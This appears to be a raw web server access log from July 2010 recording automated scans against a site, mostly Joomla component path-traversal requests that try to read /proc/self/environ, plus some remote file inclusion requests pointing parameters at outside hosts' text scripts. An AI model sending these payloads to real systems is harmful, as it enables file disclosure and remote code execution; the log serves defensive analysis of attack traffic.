91.121.141.186 - - [31/Jul/2010:09:17:29 -0700] "GET /logs//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:17:29 -0700] "GET /index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:17:29 -0700] "GET /logs//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:17:32 -0700] "GET /logs/access_100608.log//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:17:33 -0700] "GET /index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:17:33 -0700] "GET /logs//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:17:34 -0700] "GET /logs/access_100608.log//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:17:34 -0700] "GET /index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:17:34 -0700] "GET /logs//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:17:35 -0700] "GET /logs/access_100707.log//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:17:35 -0700] "GET /logs/access_100707.log//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
38.117.96.153 - - [31/Jul/2010:09:17:37 -0700] "GET /logs/access_100716.log//index.php?option=com_biblestudy&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
38.117.96.153 - - [31/Jul/2010:09:17:37 -0700] "GET /index.php?option=com_biblestudy&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.831" "www.puaga.com"
38.117.96.153 - - [31/Jul/2010:09:17:47 -0700] "GET /logs//index.php?option=com_biblestudy&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.831" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:17:54 -0700] "GET /logs/access_100610.log//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:17:54 -0700] "GET /index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:17:54 -0700] "GET /logs//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:17:55 -0700] "GET /logs/access_100612.log//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:17:57 -0700] "GET /logs/access_100612.log//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:17:57 -0700] "GET /logs/access_100610.log//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:17:58 -0700] "GET /index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:17:58 -0700] "GET /logs//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
203.147.62.92 - - [31/Jul/2010:09:18:01 -0700] "GET /logs/access_100221.log//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.irishtoothache.com/id1.txt????? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:18:07 -0700] "GET /logs/access_100608.log//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:18:08 -0700] "GET /index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:18:08 -0700] "GET /logs//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:18:23 -0700] "GET /index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
203.147.62.92 - - [31/Jul/2010:09:18:23 -0700] "GET /logs//index.php?option=com_datsogallery&Itemid=&mosConfig.absolute.path=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:18:23 -0700] "GET /logs/access_100610.log//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
203.147.62.92 - - [31/Jul/2010:09:18:24 -0700] "GET /logs/access_100604.log%20%20//index.php?option=com_datsogallery&Itemid=&mosConfig.absolute.path=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.147.62.92 - - [31/Jul/2010:09:18:24 -0700] "GET /index.php?option=com_datsogallery&Itemid=&mosConfig.absolute.path=http://www.irishtoothache.com/ver1? HTTP/1.1" 200 3640 "-" "Mozilla/5.0" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:18:26 -0700] "GET /index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:18:26 -0700] "GET /logs/access_100606.log//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:18:27 -0700] "GET /logs/access_100606.log//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:18:31 -0700] "GET /index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:18:31 -0700] "GET /index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
203.147.62.92 - - [31/Jul/2010:09:18:35 -0700] "GET /logs/access_100714.log%20%20//index.php?option=com_datsogallery&Itemid=&mosConfig.absolute.path=http://www.irishtoothache.com/ver1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:18:35 -0700] "GET /index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:18:36 -0700] "GET /index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:18:50 -0700] "GET /index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:18:50 -0700] "GET /logs/access_100608.log//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:18:51 -0700] "GET /index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:18:51 -0700] "GET /logs//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:09:18:55 -0700] "GET /logs/access_100605.log/index.php?option=com_wgpicasa&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:09:18:55 -0700] "GET /index.php?option=com_wgpicasa&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.834" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:18:56 -0700] "GET /index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:18:59 -0700] "GET /index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:09:18:59 -0700] "GET /logs/access_100605.log/index.php?option=com_wgpicasa&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:09:18:59 -0700] "GET /index.php?option=com_wgpicasa&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.834" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:09:19:01 -0700] "GET /logs/index.php?option=com_wgpicasa&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:19:02 -0700] "GET /logs/access_100610.log//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:09:19:04 -0700] "GET /logs/index.php?option=com_wgpicasa&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:09:19:04 -0700] "GET /logs/access_100515.log/index.php?option=com_wgpicasa&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:19:05 -0700] "GET /index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:19:15 -0700] "GET /index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:19:17 -0700] "GET /logs/access_100608.log//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:19:17 -0700] "GET /index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:19:17 -0700] "GET /logs//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:19:28 -0700] "GET /logs/access_100707.log//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:19:28 -0700] "GET /index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:19:28 -0700] "GET /logs//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
218.234.23.94 - - [31/Jul/2010:09:19:30 -0700] "GET /logs/access_100509.log%20%20/index0.php?show=http://razi.teo.ir/images/maghale/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.23.94 - - [31/Jul/2010:09:19:30 -0700] "GET /index0.php?show=http://razi.teo.ir/images/maghale/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.234.23.94 - - [31/Jul/2010:09:19:30 -0700] "GET /logs/index0.php?show=http://razi.teo.ir/images/maghale/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:19:31 -0700] "GET /logs/access_100521.log//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:19:31 -0700] "GET /logs/access_100707.log//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:19:32 -0700] "GET /index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:19:32 -0700] "GET /logs/access_100707.log//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:19:32 -0700] "GET /logs//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:19:32 -0700] "GET /index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:19:32 -0700] "GET /logs//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
218.234.23.94 - - [31/Jul/2010:09:19:51 -0700] "GET /logs/access_100509.log/index0.php?show=http://razi.teo.ir/images/maghale/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:19:52 -0700] "GET /logs/access_100608.log//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:19:52 -0700] "GET /logs/access_100608.log//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:19:57 -0700] "GET /logs/access_100707.log//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:19:57 -0700] "GET /index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:19:57 -0700] "GET /logs//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:20:00 -0700] "GET /logs/access_100521.log//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:09:20:05 -0700] "GET /logs/access_100610.log/index.php?option=com_wgpicasa&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:09:20:05 -0700] "GET /index.php?option=com_wgpicasa&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.834" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:09:20:07 -0700] "GET /logs/access_100608.log/index.php?option=com_wgpicasa&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:09:20:10 -0700] "GET /logs/access_100608.log/index.php?option=com_wgpicasa&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:09:20:10 -0700] "GET /logs/index.php?option=com_wgpicasa&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:09:20:12 -0700] "GET /index.php?option=com_wgpicasa&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.834" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:09:20:12 -0700] "GET /logs/index.php?option=com_wgpicasa&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:09:20:12 -0700] "GET /logs/access_100605.log/index.php?option=com_wgpicasa&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:09:20:13 -0700] "GET /index.php?option=com_wgpicasa&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.834" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:09:20:13 -0700] "GET /logs/index.php?option=com_wgpicasa&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:09:20:15 -0700] "GET /index.php?option=com_wgpicasa&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.834" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:09:20:15 -0700] "GET /logs/index.php?option=com_wgpicasa&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:09:20:19 -0700] "GET /logs/access_100521.log/index.php?option=com_wgpicasa&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
89.108.67.164 - - [31/Jul/2010:09:20:29 -0700] "GET /logs/access_100226.log///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
89.108.67.164 - - [31/Jul/2010:09:20:29 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
89.108.67.164 - - [31/Jul/2010:09:20:30 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://constructor.ru/modules/goodid.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:09:20:30 -0700] "GET /logs/access_100507.log/index.php?option=com_wgpicasa&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:09:20:32 -0700] "GET /logs/access_100507.log/index.php?option=com_wgpicasa&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
91.121.141.186 - - [31/Jul/2010:09:20:43 -0700] "GET /logs/access_100610.log//index.php?option=com_memory&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:09:20:46 -0700] "GET /logs/access_100506.log/index.php?option=com_wgpicasa&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:09:20:51 -0700] "GET /logs/access_100515.log/index.php?option=com_wgpicasa&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:09:20:51 -0700] "GET /index.php?option=com_wgpicasa&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.834" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:09:20:51 -0700] "GET /logs/index.php?option=com_wgpicasa&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:09:20:59 -0700] "GET /logs/access_100515.log/index.php?option=com_wgpicasa&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:09:20:59 -0700] "GET /index.php?option=com_wgpicasa&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.834" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:09:20:59 -0700] "GET /logs/index.php?option=com_wgpicasa&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:09:21:00 -0700] "GET /logs/access_100515.log/index.php?option=com_wgpicasa&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.834" "www.puaga.com"
64.34.172.171 - - [31/Jul/2010:09:21:00 -0700] "GET /index.php?option=com_wgpicasa&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 3640 "-" "libwww-perl/5.834" "www.puaga.com"
